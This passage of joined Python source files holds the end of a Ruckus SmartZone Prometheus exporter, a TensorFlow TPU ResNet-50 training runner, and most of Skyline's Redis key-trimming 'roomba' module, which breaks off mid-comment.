GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'port1': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'port2': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) } } system_summary_metric = { 'maxApOfCluster': GaugeMetricFamily('smartzone_cluster_maxAPs', 'SmartZone Cluster number of maximum possible connected APs', labels=["id"]), 'totalRemainingApCapacity': GaugeMetricFamily('smartzone_cluster_totalRemainingApCapacity', 'SmartZone Cluster number of total remaining possible connected APs', labels=["id"]), } ap_list = { 'apGroupId': GaugeMetricFamily('smartzone_aps_list_ap_groupId', 'SmartZone APs list ap groupId', labels=["zone_id", "ap_mame", "ap_mac", "groupId"]), 'serial': GaugeMetricFamily('smartzone_aps_list_ap_serial', 'SmartZone APs list ap serial number', labels=["zone_id", "ap_mame", "ap_mac", "serial"]) } ap_metrics = { 'mac': GaugeMetricFamily('smartzone_ap_mac', 'SmartZone AP mac', labels=["ap_mac", "mac"]), 'model': GaugeMetricFamily('smartzone_ap_model', 'SmartZone AP model', labels=["ap_mac", "model"]), 'version': GaugeMetricFamily('smartzone_ap_version', 'SmartZone AP version', labels=["ap_mac", "version"]), 'description': GaugeMetricFamily('smartzone_ap_description', 'SmartZone AP description', labels=["ap_mac", "description"]), 'zoneId': GaugeMetricFamily('smartzone_ap_zoneId', 'SmartZone AP zone id', labels=["ap_mac", "zoneId"]), 'connectionState': GaugeMetricFamily('smartzone_ap_connectionState', 'SmartZone AP connection state', labels=["ap_mac", "connectionState"]), 'wifi50Channel': GaugeMetricFamily('smartzone_ap_wifi50Channel', 'SmartZone AP 5GHz channel number', labels=["ap_mac"]), 'wifi24Channel': GaugeMetricFamily('smartzone_ap_wifi24Channel', 'SmartZone AP 2.4GHz channel number', labels=["ap_mac"]), 'approvedTime': GaugeMetricFamily('smartzone_ap_approvedTime', 'SmartZone AP approved time', labels=["ap_mac"]), 'lastSeenTime': GaugeMetricFamily('smartzone_ap_lastSeenTime', 'SmartZone AP last seen time', labels=["ap_mac"]), 'uptime': GaugeMetricFamily('smartzone_ap_uptime', 'SmartZone AP uptime', labels=["mac"]), 'clientCount': GaugeMetricFamily('smartzone_ap_clientCount', 'SmartZone AP client count', labels=["ap_mac"]) } ap_summary_list = { 'location': GaugeMetricFamily('smartzone_aps_location', 'SmartZone AP location', labels=["ap_mame", "ap_mac", "location"]), 'configState': GaugeMetricFamily('smartzone_aps_configState', 'SmartZone AP configState', labels=["ap_mame", "ap_mac", "configState"]), 'criticalCount': GaugeMetricFamily('smartzone_aps_alarms_criticalCount', 'SmartZone AP criticalCount alarm', labels=["ap_mame", "ap_mac"]), 'majorCount': GaugeMetricFamily('smartzone_aps_alarms_majorCount', 'SmartZone majorCount alarms', labels=["ap_mame", "ap_mac"]), 'minorCount': GaugeMetricFamily('smartzone_aps_alarms_minorCount', 'SmartZone AP minorCount alarms', labels=["ap_mame", "ap_mac"]), 'warningCount': GaugeMetricFamily('smartzone_aps_alarms_warningCount', 'SmartZone AP warningCount alarm', labels=["ap_mame", "ap_mac"]) } domain_metrics = { 'domainType': GaugeMetricFamily('smartzone_domain_type', 'SmartZone Domain name', labels=["domain_id", "domain_name", "domainType"]), 'parentDomainId': GaugeMetricFamily('smartzone_domain_parentDomainId', 'SmartZone Domain parent domain ID', labels=["domain_id", "domain_name", "parentDomainId"]), 'subDomainCount': GaugeMetricFamily('smartzone_domain_subDomainCount', 'SmartZone Domain sub domain numbers', labels=["domain_id", "domain_name"]), 'apCount': GaugeMetricFamily('smartzone_domain_apCount', 'SmartZone Domain total count of APs', labels=["domain_id", "domain_name"]), 'zoneCount': GaugeMetricFamily('smartzone_domain_zoneCount', 'SmartZone Domain count of zones', labels=["domain_id", "domain_name"]) } license_metrics = { 'description': GaugeMetricFamily('smartzone_license_description', 'SmartZone License description', labels=["license_name", "description"]), 'count': GaugeMetricFamily('smartzone_license_count', 'SmartZone License count', labels=["license_name"]), 'createTime': GaugeMetricFamily('smartzone_license_createTime', 'SmartZone License created date', labels=["license_name", "createTime"]), 'expireDate': GaugeMetricFamily('smartzone_license_expireDate', 'SmartZone License expire date', labels=["license_name", "expireDate"]) } self.get_session() id = 0 # Get SmartZone controller metrics for c in self.get_metrics(controller_metrics, 'controller')['list']: id = c['id'] for s in self._statuses: if s == 'uptimeInSec': controller_metrics[s].add_metric([id], c.get(s)) # Export a dummy value for string-only metrics else: extra = c[s] controller_metrics[s].add_metric([id, extra], 1) for m in controller_metrics.values(): yield m # Get SmartZone system metric path = 'controller/' + id + '/statistics' system = self.get_metrics(system_metric, path) for c in system_metric: varList = list(system_metric[c].keys()) for s in varList: # Add dummy comment (port name) for port statistic if c == 'port1' or c == 'port2' or c == 'control' or c == 'cluster' or c == 'management': system_metric[c][s].add_metric([id, c], system[0][c].get(s)) # For normal metric else: system_metric[c][s].add_metric([id], system[0][c].get(s)) for m in system_metric[c].values(): yield m # Ges SmartZone system summary c = self.get_metrics(system_summary_metric, 'system/devicesSummary') for s in self._statuses: system_summary_metric[s].add_metric([id], c.get(s)) for m in system_summary_metric.values(): yield m # Get SmartZone inventory per zone # For each zone captured from the query: # - Grab the zone name and zone ID for labeling purposes # - Loop through the statuses in statuses # - For each status, get the value for the status in each zone and add to the metric for zone in self.get_metrics(zone_metrics, 'system/inventory')['list']: zone_name = zone['zoneName'] zone_id = zone['zoneId'] for s in self._statuses: zone_metrics[s].add_metric([zone_name, zone_id], zone.get(s)) for m in zone_metrics.values(): yield m # Get APs list per zone or a domani # For each APs captured from the query: # - Grab the zone ID for labeling purposes # - For each APs, get mac, zoneID, apGroupIdm, name, lanPortSize ap_glob_mac = [] for ap in self.get_metrics(ap_list, 'aps')['list']: zone_id = ap['zoneId'] ap_mame = ap['name'] ap_mac = ap['mac'] ap_glob_mac.append(ap_mac) for s in self._statuses: # Export a dummy value for string-only metrics extra = ap[s] ap_list[s].add_metric([zone_id, ap_mame, ap_mac, extra], 1) for m in ap_list.values(): yield m num_worker_threads = 10 def source(): return ap_glob_mac def worker(): while True: item = q.get() if item is None: break path = 'aps/' + item + '/operational/summary' r.put(self.get_metrics(ap_metrics, path)) q.task_done() # Queue for threads q = queue.Queue() # Queue for result from api r = queue.Queue() threads = [] for i in range(num_worker_threads): t = threading.Thread(target=worker) t.start() threads.append(t) for item in source(): q.put(item) # block until all tasks are done q.join() # stop workers for i in range(num_worker_threads): q.put(None) for t in threads: t.join() ap_mac = 0 for i in range(r.qsize()): ap_detail = r.get(block=True, timeout=None) for d in list(ap_metrics.keys()): if d == 'mac': ap_mac = ap_detail[d] if d == 'description' or d == 'version' or d == 'model' or d == 'zoneId' or d == 'mac' or d == 'connectionState': extra = ap_detail[d] ap_metrics[d].add_metric([ap_mac, extra], 1) else: ap_metrics[d].add_metric([ap_mac], ap_detail.get(d)) for m in ap_metrics.values(): yield m # Get APs summary information for ap in self.get_metrics(ap_summary_list, 'aps/lineman')['list']: ap_mame = ap['name'] ap_mac = ap['mac'] for s in self._statuses: if s == 'criticalCount' or s == 'majorCount' or s == 'minorCount' or s == 'warningCount': ap_summary_list[s].add_metric([ap_mame, ap_mac], ap['alarms'].get(s)) else: extra = ap[s] ap_summary_list[s].add_metric([ap_mame, ap_mac, extra], 1) for m in ap_summary_list.values(): yield m # Collect domain information for c in self.get_metrics(domain_metrics, 'domains')['list']: domain_id = c['id'] domain_name = c['name'] for s in self._statuses: if s == 'domainType' or s == 'parentDomainId': extra = c[s] domain_metrics[s].add_metric([domain_id, domain_name, extra], 1) else: domain_metrics[s].add_metric([domain_id, domain_name], c.get(s)) for m in domain_metrics.values(): yield m # Collect license information for c in self.get_metrics(license_metrics, 'licenses')['list']: license_name = c['name'] for s in self._statuses: if s == 'count': license_metrics[s].add_metric([license_name], c.get(s)) else: extra = c[s] license_metrics[s].add_metric([license_name, extra], 1) for m in license_metrics.values(): yield m # Function to parse command line arguments and pass them to the collector def parse_args(): parser = argparse.ArgumentParser(description='Ruckus SmartZone exporter for Prometheus') # Use add_argument() method to specify options # By default argparse will treat any arguments with flags (- or --) as optional # Rather than make these required (considered bad form), we can create another group for required options required_named = parser.add_argument_group('required named arguments') required_named.add_argument('-u', '--user', help='SmartZone API user', required=True) required_named.add_argument('-p', '--password', help='SmartZone API password', required=True) required_named.add_argument('-t', '--target', help='Target URL and port to access SmartZone, e.g. https://smartzone.example.com:8443', required=True) # Add store_false action to store true/false values, and set a default of True parser.add_argument('--insecure', action='store_false', help='Allow insecure SSL connections to Smartzone') # Specify integer type for the listening port parser.add_argument('--port', type=int, default=9345, help='Port on which to expose metrics and web interface (default=9345)') # Now that we've added the arguments, parse them and return the values as output return parser.parse_args() def main(): try: args = parse_args() port = int(args.port) REGISTRY.register(SmartZoneCollector(args.target, args.user, args.password, args.insecure)) # Start HTTP server on specified port start_http_server(port) if args.insecure == False: print('WARNING: Connection to {} may not be secure.'.format(args.target)) print("Polling {}. Listening on ::{}".format(args.target, port)) while True: time.sleep(1) except KeyboardInterrupt: print(" Keyboard interrupt, exiting...") exit(0) if __name__ == "__main__": main()
train_runner.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Bypass TPUEstimator for ResNet-50 Train.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import math import threading import time from absl import flags import tensorflow as tf from tensorflow.contrib import tpu from tensorflow.contrib.tpu.python.tpu import tpu_function from tensorflow.core.protobuf import rewriter_config_pb2 from tensorflow.python.data.util import nest as data_nest from tensorflow.python.framework import graph_io FLAGS = flags.FLAGS _INITIAL_LOSS = 1e7 def device_for_tpu_core(task=0, core=0): job_name = FLAGS.tpu_job_name or "tpu_worker" return "/job:%s/task:%d/device:TPU_REPLICATED_CORE:%d" % (job_name, task, core) def wrap_computation_in_while_loop(op_fn, n, parallel_iterations=1): """Wraps the ops generated by `op_fn` in tf.while_loop.""" def computation(i): ops = op_fn() if not isinstance(ops, list): ops = [ops] with tf.control_dependencies(ops): return i + 1 return tf.while_loop( lambda i: tf.less(i, n), computation, [tf.constant(0)], parallel_iterations=parallel_iterations) def tpu_ordinal_fn(shard_index_in_host): """Return the TPU ordinal associated with a shard. Required because the enqueue ops are placed on CPU. Args: shard_index_in_host: the shard index Returns: The ordinal of the TPU device the shard's infeed should be placed on. """ return shard_index_in_host % FLAGS.tpu_cores_per_host class TrainRunner(object): """Remove init overheads in TPU Estimator via direct session.run calls.""" def __init__(self, iterations, train_steps): tf.logging.info("TrainRunner: constructor") self.feature_structure = {} self.loss = None self.infeed_queue = [] self.enqueue_ops = [] self.dataset_initializer = [] self.iterations = iterations self.sess = None self.input_sess = None self.infeed_thread = None if train_steps % iterations != 0: train_steps = iterations * int(math.ceil(train_steps / iterations)) self.train_steps = train_steps self.input_graph = tf.Graph() tpu_init = [tpu.initialize_system()] self.tpu_shutdown = tpu.shutdown_system() self.cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu or FLAGS.master, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) self.config = tf.ConfigProto(operation_timeout_in_ms=600 * 60 * 1000, graph_options=tf.GraphOptions( rewrite_options=rewriter_config_pb2.RewriterConfig( disable_meta_optimizer=True)), isolate_session_state=True) cluster_spec = self.cluster_resolver.cluster_spec() if cluster_spec: self.config.cluster_def.CopyFrom(cluster_spec.as_cluster_def()) self.init_sess = tf.Session(self.cluster_resolver.get_master(), config=self.config) self.init_sess.run(tpu_init) def device_for_host(self, task=0, cpu=0): job_name = FLAGS.tpu_job_name or "tpu_worker" return "/job:%s/task:%d/device:CPU:%d" % (job_name, task, cpu) def build_enqueue_ops(self, input_fn, params, host_id): """Build enqueue operations for the input pipeline in a given host. Args: input_fn: dataset input graph generation function params: input function parameters host_id: host identifier """ iparams = {} iparams["batch_size"] = params["batch_size"] // FLAGS.num_cores iparams["dataset_num_shards"] = FLAGS.num_cores // FLAGS.tpu_cores_per_host def get_enqueue_ops_fn(): """Generate the enqueue ops graph function.""" iparams["dataset_index"] = host_id dataset = input_fn(iparams) iterator = dataset.make_initializable_iterator() self.dataset_initializer.append(iterator.initializer) def enqueue_ops_fn(): """Generate the infeed enqueue ops graph.""" per_host_sharded_inputs = [] control_deps = [] with tf.device(self.device_for_host(task=host_id)): for _ in range(FLAGS.tpu_cores_per_host): with tf.control_dependencies(control_deps): features, labels = iterator.get_next() self.feature_structure["features"] = features self.feature_structure["labels"] = labels flattened_inputs = data_nest.flatten(self.feature_structure) control_deps.extend(flattened_inputs) per_host_sharded_inputs.append(flattened_inputs) infeed = tpu.InfeedQueue( number_of_tuple_elements=len(per_host_sharded_inputs[0])) self.infeed_queue.append(infeed) return infeed.generate_enqueue_ops( per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn) return enqueue_ops_fn with self.input_graph.as_default(): with tf.device(self.device_for_host(host_id)): self.enqueue_ops.append( wrap_computation_in_while_loop( get_enqueue_ops_fn(), n=self.train_steps, parallel_iterations=1)) def initialize(self, input_fn, model_fn, params): """Build graphs for the TPU device and the input pipelines. Args: input_fn: Dataset input graph generation function model_fn: Model definition function params: Parameters to input and model functions """ tf.logging.info("TrainRunner: initialize method") def infeed_thread_fn(): """Build and infeed session.run calls in a background thread.""" i = 1 while i < FLAGS.num_cores // FLAGS.tpu_cores_per_host: self.build_enqueue_ops(input_fn, params, i) i += 1 # Build infeed sesssion self.input_sess = tf.Session( self.cluster_resolver.get_master(), graph=self.input_graph, config=self.config) self.input_sess.run(self.dataset_initializer) # Run infeed session.run calls self.input_sess.run([self.enqueue_ops]) self.build_enqueue_ops(input_fn, params, 0) def get_tpu_step(mparams): """Get the TPU graph generation function.""" def tpu_step(loss): """Generate the TPU graph.""" del loss values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0) unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure, values) features = unflattened_inputs["features"] labels = unflattened_inputs["labels"] estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN, mparams) loss, train_op = estimator_spec.loss, estimator_spec.train_op with tf.device(device_for_tpu_core()): with tf.control_dependencies([train_op]): return tf.identity(loss) return tpu_step tpu_step = get_tpu_step(params) @tpu_function.on_device_training_loop def tpu_loop(): return tpu.repeat(self.iterations, tpu_step, [_INITIAL_LOSS]) (self.loss,) = tpu.shard( tpu_loop, inputs=[], num_shards=FLAGS.num_cores, outputs_from_all_shards=False, ) initializer = tf.global_variables_initializer() self.saver = tf.train.Saver() graph_io.write_graph(tf.Graph().as_graph_def(add_shapes=True), FLAGS.model_dir, "graph.pbtxt") # Build tpu train model session and initialize graph self.sess = tf.Session( self.cluster_resolver.get_master(), config=self.config) self.sess.run(initializer) # Complete infeed graph generation and session.run calls self.infeed_thread = threading.Thread(target=infeed_thread_fn) self.infeed_thread.start() def train(self, num_threads=2): """Run the Train steps on the TPU device. Args: num_threads: number of outstanding checkpointing threads """ def checkpoint_thread_fn(saver, sess): saver.save(sess, FLAGS.model_dir + "/model.ckpt-%d" % (cur_step)) cur_step = 0 thread_id = 0 checkpoint_threads = [] tf.logging.info("TrainRunner: step %d", cur_step) for i in range(num_threads): checkpoint_threads.append(None) while cur_step < self.train_steps: start = time.time() tf.logging.info("TrainRunner: start next %d steps", self.iterations) cur_step += self.iterations loss = self.sess.run([self.loss]) if checkpoint_threads[thread_id] is not None: checkpoint_threads[thread_id].join() checkpoint_threads[thread_id] = threading.Thread( target=checkpoint_thread_fn, args=(self.saver, self.sess)) checkpoint_threads[thread_id].start() thread_id += 1 if thread_id >= num_threads: thread_id = 0 end = time.time() tf.logging.info( "TrainRunner: step {} loss {} step time {} sec {} examples/sec" .format(cur_step, loss, end - start, self.iterations * FLAGS.train_batch_size / (end - start))) self.infeed_thread.join() for i in range(num_threads): if checkpoint_threads[i] is not None: checkpoint_threads[i].join() checkpoint_threads[i] = None def shutdown(self): self.init_sess.run(self.tpu_shutdown)
roomba.py
from __future__ import division # @modified 20191115 - Branch #3262: py3 # from os import kill, getpid from os import kill from redis import StrictRedis, WatchError from multiprocessing import Process from threading import Thread from msgpack import Unpacker, packb try: from types import TupleType except ImportError: eliminated_in_python3 = True from time import time, sleep from math import ceil # import traceback import logging import sys import os.path from os import remove as os_remove sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir)) sys.path.insert(0, os.path.dirname(__file__)) # @modified 20191115 - Branch #3262: py3 # This prevents flake8 E402 - module level import not at top of file if True: import settings # @added 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # Added a single functions to deal with Redis connection and the # charset='utf-8', decode_responses=True arguments required in py3 from skyline_functions import get_redis_conn, get_redis_conn_decoded parent_skyline_app = 'horizon' child_skyline_app = 'roomba' skyline_app_logger = '%sLog' % parent_skyline_app logger = logging.getLogger(skyline_app_logger) skyline_app = '%s.%s' % (parent_skyline_app, child_skyline_app) skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, parent_skyline_app) skyline_app_loglock = '%s.lock' % skyline_app_logfile skyline_app_logwait = '%s.wait' % skyline_app_logfile python_version = int(sys.version_info[0]) # @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # Feature #3480: batch_processing # Feature #3486: analyzer_batch try: from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS except: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False try: from settings import BATCH_PROCESSING except: BATCH_PROCESSING = None try: BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES) except: BATCH_PROCESSING_NAMESPACES = [] try: from settings import BATCH_PROCESSING_DEBUG except: BATCH_PROCESSING_DEBUG = None class Roomba(Thread): """ The Roomba is responsible for deleting keys older than DURATION. """ def __init__(self, parent_pid, skip_mini): super(Roomba, self).__init__() # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow # @modified 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # if settings.REDIS_PASSWORD: # self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) # else: # self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) # @added 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # Added a single functions to deal with Redis connection and the # charset='utf-8', decode_responses=True arguments required in py3 self.redis_conn = get_redis_conn(skyline_app) self.redis_conn_decoded = get_redis_conn_decoded(skyline_app) self.daemon = True self.parent_pid = parent_pid self.skip_mini = skip_mini def check_if_parent_is_alive(self): """ Self explanatory. """ try: kill(self.parent_pid, 0) except: # @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics # Log warning logger.warning('warning :: parent process is dead') exit(0) def vacuum(self, i, namespace, duration): """ Trim metrics that are older than settings.FULL_DURATION and purge old metrics. """ begin = time() logger.info('%s :: started vacuum' % (skyline_app)) # Discover assigned metrics namespace_unique_metrics = '%sunique_metrics' % str(namespace) # @modified 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # unique_metrics = list(self.redis_conn.smembers(namespace_unique_metrics)) unique_metrics = list(self.redis_conn_decoded.smembers(namespace_unique_metrics)) # @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # Feature #3480: batch_processing # Feature #3486: analyzer_batch if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS and BATCH_PROCESSING and BATCH_PROCESSING_NAMESPACES: try: # @modified 20211127 - Feature #4328: BATCH_METRICS_CUSTOM_FULL_DURATIONS # Ensure that known and new batch_processing_metrics are # accounted for # batch_metrics = list(self.redis_conn_decoded.smembers('aet.analyzer.batch_processing_metrics')) batch_metrics1 = list(self.redis_conn_decoded.smembers('aet.analyzer.batch_processing_metrics')) batch_metrics2 = list(self.redis_conn_decoded.smembers('analyzer.batch_processing_metrics')) all_batch_metrics = batch_metrics1 + batch_metrics2 batch_metrics = list(set(all_batch_metrics)) except: logger.error('error - failed to get Redis set aet.analyzer.batch_processing_metrics') batch_metrics = [] if batch_metrics: full_namespace_batch_metrics = [] for base_name in batch_metrics: metric = ''.join((settings.FULL_NAMESPACE, base_name)) full_namespace_batch_metrics.append(metric) del batch_metrics non_batch_unique_metrics = [] for metric in unique_metrics: if metric not in full_namespace_batch_metrics: non_batch_unique_metrics.append(metric) # @modified 20200815 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # del after log # UnboundLocalError: local variable 'full_namespace_batch_metrics' referenced before assignment # del full_namespace_batch_metrics if non_batch_unique_metrics: logger.info('roomba :: batch_processing :: removing %s batch metrics from unique_metrics' % str(len(full_namespace_batch_metrics))) unique_metrics = non_batch_unique_metrics del non_batch_unique_metrics # @added 20200815 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS del full_namespace_batch_metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ROOMBA_PROCESSES))) if i == settings.ROOMBA_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = min(len(unique_metrics), i * keys_per_processor) assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] euthanized = 0 blocked = 0 trimmed_keys = 0 active_keys = 0 # @modified 20191016 - Task #3280: Handle py2 xange and py3 range # Branch #3262: py3 # for i in xrange(len(assigned_metrics)): range_list = [] if python_version == 2: for i in xrange(len(assigned_metrics)): range_list.append(i) if python_version == 3: for i in range(len(assigned_metrics)): range_list.append(i) for i in range_list: self.check_if_parent_is_alive() pipe = self.redis_conn.pipeline() now = time() key = assigned_metrics[i] try: # WATCH the key pipe.watch(key) # Everything below NEEDS to happen before another datapoint # comes in. If your data has a very small resolution (<.1s), # this technique may not suit you. raw_series = pipe.get(key) unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = sorted([unpacked for unpacked in unpacker]) # Put pipe back in multi mode pipe.multi() # There's one value. Purge if it's too old try: if python_version == 2: if not isinstance(timeseries[0], TupleType): if timeseries[0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue if python_version == 3: if not isinstance(timeseries[0], tuple): if timeseries[0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue except IndexError: continue # Check if the last value is too old and purge if timeseries[-1][0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue # Remove old datapoints and duplicates from timeseries temp = set() temp_add = temp.add delta = now - duration trimmed = [ tuple for tuple in timeseries if tuple[0] > delta and tuple[0] not in temp and not temp_add(tuple[0]) ] # Purge if everything was deleted, set key otherwise if len(trimmed) > 0: # Serialize and turn key back into not-an-array btrimmed = packb(trimmed) if len(trimmed) <= 15: value = btrimmed[1:] elif len(trimmed) <= 65535: value = btrimmed[3:] trimmed_keys += 1 else: value = btrimmed[5:] trimmed_keys += 1 pipe.set(key, value) active_keys += 1 else: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) euthanized += 1 pipe.execute() except WatchError: blocked += 1 assigned_metrics.append(key) except Exception as e: # If something bad happens, zap the key and hope it goes away pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 logger.info(e) logger.info('%s :: vacuum Euthanizing %s' % (skyline_app, key)) finally: pipe.reset() logger.info( '%s :: vacuum operated on %s %d keys in %f seconds' % (skyline_app, namespace, len(assigned_metrics), time() - begin)) logger.info('%s :: vaccum %s keyspace is now %d keys' % (skyline_app, namespace, (len(assigned_metrics) - euthanized))) logger.info('%s :: vaccum blocked %d times' % (skyline_app, blocked)) logger.info('%s :: vacuum euthanized %d geriatric keys' % (skyline_app, euthanized)) logger.info('%s :: vacuum processed %d active keys' % (skyline_app, active_keys)) logger.info('%s :: vacuum potentially trimmed %d keys' % (skyline_app, trimmed_keys)) # sleeping in the main process is more CPU efficient than sleeping # in the vacuum def # if (time() - begin < 30): # logger.info(skyline_app + ' :: sleeping due to low run time...') # sleep(10) def run(self): """ Called when process initializes. """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os_remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os_remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) logger.info('%s :: started roomba' % skyline_app) while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error( '%s :: roomba can\'t connect to redis at socket path %s' % (skyline_app, settings.REDIS_SOCKET_PATH)) sleep(10) # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow # @modified 20191115 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) # @added 20191115 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 self.redis_conn = get_redis_conn(skyline_app) self.redis_conn_decoded = get_redis_conn_decoded(skyline_app) continue # Spawn processes pids = [] for i in range(1, settings.ROOMBA_PROCESSES + 1): if not self.skip_mini: logger.info('%s :: starting vacuum process on mini namespace' % skyline_app) p = Process(target=self.vacuum, args=(i, settings.MINI_NAMESPACE, settings.MINI_DURATION + settings.ROOMBA_GRACE_TIME)) pids.append(p) p.start() logger.info('%s :: starting vacuum process' % skyline_app) p = Process(target=self.vacuum, args=(i, settings.FULL_NAMESPACE, settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME)) pids.append(p) p.start() # Send wait signal to zombie processes # for p in pids: # p.join() # deroomba - kill any lingering vacuum processes # Changed to manage Roomba processes as edge cases related to I/O # wait have been experienced that resulted in Roomba stalling so a # ROOMBA_TIMEOUT setting was added and here we use the pattern # described by http://stackoverflow.com/users/2073595/dano at # http://stackoverflow.com/a/26064238 to monitor and kill any # stalled processes rather than using p.join(TIMEOUT) - 20160505 # @earthgecko ref 1342 logger.info('%s :: allowing vacuum process/es %s seconds to run' % ( skyline_app, str(settings.ROOMBA_TIMEOUT))) start = time() while time() - start <= settings.ROOMBA_TIMEOUT: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - start logger.info('%s :: vacuum processes completed in %.2f' % (skyline_app, time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all Roomba processes' % (skyline_app)) for p in pids: p.terminate() p.join() # sleeping in the main process is more CPU efficient than sleeping # in the vacuum def also roomba is quite CPU intensive so we only # what to run roomba once every minute process_runtime = time() - now # @added 20210513 - Feature #4066: ROOMBA_OPTIMUM_RUN_DURATION try: ROOMBA_OPTIMUM_RUN_DURATION = int(settings.ROOMBA_OPTIMUM_RUN_DURATION) except Exception as e: logger.warn('%s :: roomba failed to determine ROOMBA_OPTIMUM_RUN_DURATION from settings, defaulting to 60 - %s' % ( skyline_app, e)) ROOMBA_OPTIMUM_RUN_DURATION = 60 # @modified 20210513 - Feature #4066: 